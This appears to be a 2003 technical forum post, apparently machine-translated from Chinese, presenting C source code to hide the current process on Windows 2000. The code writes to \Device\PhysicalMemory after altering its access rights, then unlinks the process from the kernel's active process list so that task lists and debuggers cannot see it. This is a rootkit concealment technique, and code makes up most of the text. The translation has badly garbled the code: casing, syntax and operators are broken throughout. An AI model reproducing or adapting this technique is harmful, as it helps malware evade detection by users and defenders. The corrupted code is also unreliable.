A solution hidden under Win2000 process
Creation time: 2003-09-15
Article attribute: original
Article submission: PJF_ (PJF_AT_USTC.EDU)
The last time I mentioned this thing, because it is very simple to think that there is no need to say more, but someone is required to write, so add a few words:
Many posts are analyzed in this matter, such as APIHOOK, system service hook, etc., so that there is no procedure in the far thread, this is not "hidden".
Here you write a completely hidden method of 2000, it is very simple, there is no new idea.
Before explanation, first mention some structures, there are several processes related chains in the process enforcement block, one of which is the active process chain. Important of this chain
One of the functions is to query system information for traversing the current activity process, which is interesting is that M $ may cause it due to efficiency factors to exclude the process core block.
It does not take advantage of the operation of the thread switching and other operations, further rewriting it does not have a problem that cannot be ignored (this is the foundation of this program).
How to do it is obvious, delete the process you want to have in the bidirectional chain of the activity process or the core debugger (such as Softice / Proc) can not be found.
The code for hiding the current process under 2000 is as follows:
#include
#include
#include
#define nt_success (status) (status)> = 0)
#DEFINE STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L)
#define status_access_denied ((ntstatus) 0xc0000022L)
TypedEf long NTSTATUS;
Typedef struct _io_status_block
{
NTSTATUS STATUS;
Ulong information;
} }_Status_block, * pio_status_block;
Typedef struct _unicate_string
{
Ushort Length;
Ushort maximumlength;
PWSTR BUFFER;
} Unicode_string, * punicode_string;
#define obj_inherit 0x00000002L
#define obj_pers_Permanent 0x00000010L
#define obj_exclusive 0x00000020L
#define obj_case_insensitive 0x00000040L
#define obj_openif 0x00000080L
#define obj_openlink 0x00000100L
#define obj_kernel_handle 0x00000200L
#define obj_valid_attributes 0x000003F2L
Typedef struct _object_attributes
{
Ulong Length;
Handle rootdirectory;
Punicode_String ObjectName;
Ulong attributes;
PVOID SecurityDescriptor;
Pvoid SecurityQualityOfService;
} Object_attributes, * pobject_attribute;
TypeDef NTSTATUS (Callback * ZWopense) (
Out phandle sectionhandle,
IN Access_mask desidaccess,
In POBJECT_ATTRIBUTES OBJECTATTRIBUTES
);
TypeDef void (Callback * RTLinitunicodeString) (in out dstinationstring,
In Pcwstr SourceString
);
RTLinitunicodeString RTLinitunicodeString;
Zwopensection Zwopense;
HModule g_hntdll = null;
PVOID G_PMAPPHYSICALMORY = NULL;
Handle g_hmpm = NULL;
BOOL initntll ()
{
g_hntdll = loadingLibrary ("ntdll.dll");
IF (! g_hntdll)
{
Return False;
}
RTLINITUNICODESTRING =
(RTLinitunicodeString) GetProcaddress (g_hntdll, "rtLinitUnicodestring");
Zwopensection =
(Zwopensection) GetProcaddress (g_hntdll, "zwopensection");
Return True;
}
Void Closentdll ()
{
IF (g_hntdll! = null)
{
Freelibrary (g_hntdll);
}
}
Void SetPhyscialMemorysectionCanbewrite (Handle Hsection)
{
PACL PDACL = NULL;
PACL PNEWDACL = NULL;
PSecurity_Descriptor PSD = NULL;
DWORD DWRES;
EXPLICIT_ACCESS EA;
IF (dwres = getsecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION,
NULL, NULL, & PDACL, NULL, & PSD)! = Error_Success
{
Goto cleanup;
}
ZeromeMory (& EA, SIZEOF (EXPLICIT_ACCESS));
Ea.grfaccesspermissions = section_map_write;
Ea.grfaccessmode = GRANT_ACCESS;
Ea.grfinheritance = no_inheritance;
Ea.trustee.trusteeform = trustee_is_name;
EA.TRUSTEE.TRUSTEETEETYPE = trustee_is_user;
Ea.trustee.ptStrName = "current_user";
IF (dwres = setENTRIESINACL (1, & EA, PDACL, & PNEWDACL)! = Error_Success)
{
Goto cleanup;
}
IF (dwres = setsecurityInfo (hsection, se_kernel_object, dacl_security_information, null, null, pnewdacl, null)! = error_success
{
Goto cleanup;
}
Cleanup:
IF (PSD)
Localfree (PSD);
IF (PNewDACL)
LocalFree (PNewDACL);
}
Handle OpenPhysicalMemory ()
{
NTSTATUS STATUS;
Unicode_String PhysmemString; Object_Attributes attribute;
RTLinitunicodeString (& PhysmemString, L "// device // physicalmemory);
Attributes.Length = sizeof (Object_attributes);
Attributes.rootdirectory = NULL;
Attributes.Objectname = & physmemstring;
Attributes.attributes = 0;
Attributes.securityDescriptor = null;
Attributes.securityqualityofservice = null;
Status = zwopensection (& g_hmpm, section_map_read | section_map_write, & attributes);
IF (status == status_access_denied) {
Status = zwopensection (& g_hmpm, read_control | write_dac, & attributes);
SetPhyscialMemorySectionCanbewrite (g_hmpm);
CloseHandle (G_HMPM);
Status = zwopensection (& g_hmpm, section_map_write | section_map_write, & attributes);
}
IF (! NT_Success (status))
{
Return NULL;
}
g_pmapphysicalmemory = mappviewoffile
g_hmpm,
4,
0,
0x30000,
0x1000);
IF (g_pmapphysicalmemory == null)
{
Return NULL;
}
Return G_HMPM;
}
Pvoid LineArtophys (Pulong Baseaddress, Pvoid Addr)
{
Ulong Vaddr = (Ulong) Addr, PGDE, PTE, PADDR
PGDE = BaseAddress [VADDR >> 22];
IF ((pgde & 1)! = 0)
{
Ulong TMP = PGDE & 0x00000080;
IF (TMP! = 0)
{
Paddr = (PGDE & 0xFFC00000) (VADDR & 0x003FFFF);
}
Else
{
PGDE = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000);
PTE = ((pulong) PGDE [(VADDR & 0x003FF000) >> 12];
IF ((PTE & 1)! = 0)
{
PADDR = (PTE & 0xFfffff000) (VADDR & 0x00000FFF);
UNMAPVIEWOFFILE ((pvoid) PGDE;
}
Else Return 0;
}
}
Else Return 0;
Return (PVOID) PADDR;
}
Ulong getData (PVOID ADDR)
{
Ulong phys = (ulong) lineartophys ((pulong) g_pmapphysicalmemory, (pvoid) addr;
Pulong TMP = (Pulong) MapViewOffile (g_hmpm, 4, 0, phys & 0xffff000, 0x1000); if (TMP == 0)
Return 0;
Ulong Ret = TMP [(Phys & 0xFFF) >> 2];
UnmapViewoffile (TMP);
Return Ret;
}
Bool SetData (PVOID ADDR, ULONG DATA)
{
Ulong phys = (ulong) lineartophys ((pulong) g_pmapphysicalmemory, (pvoid) addr;
Pulong TMP = (Pulong) MapViewOffile (g_hmpm, file_map_write, 0, phys & 0xffff000, 0x1000);
IF (TMP == 0)
Return False;
TMP [(Phys & 0xFFF) >> 2] = DATA;
UnmapViewoffile (TMP);
Return True;
}
Bool hideprocessatall ()
{
IF (initntdll ())
{
Openphysicalmemory () == 0)
{
Return False;
}
Ulong thread = getData ((pvoid) 0xffdff124);
Ulong process = getData (pvoid (thread 0x22c));
Ulong fw = getdata (PVOID (Process 0xA0)), BW = getData (PVOID (Process 0xA4));
SetData (PVOID (FW 4), BW);
SetDATA (PVOID (BW), FW);
CloseHandle (G_HMPM);
Closentdll ();
}
Return True;
}
Call hideProcessatall hide the current process. If you hide if you run, you will be modified to the process activity chain header, run for a while.
There may be some small problems, how to solve, stay "class after-school exercises" ^ _ ^
Note that the default physical address 0x30000 is a page directory, in most cases, but there is exception! How to solve it, "..."
Let's not talk nonsense.
A slightly changed offset can be ported in NT / XP / 2003.
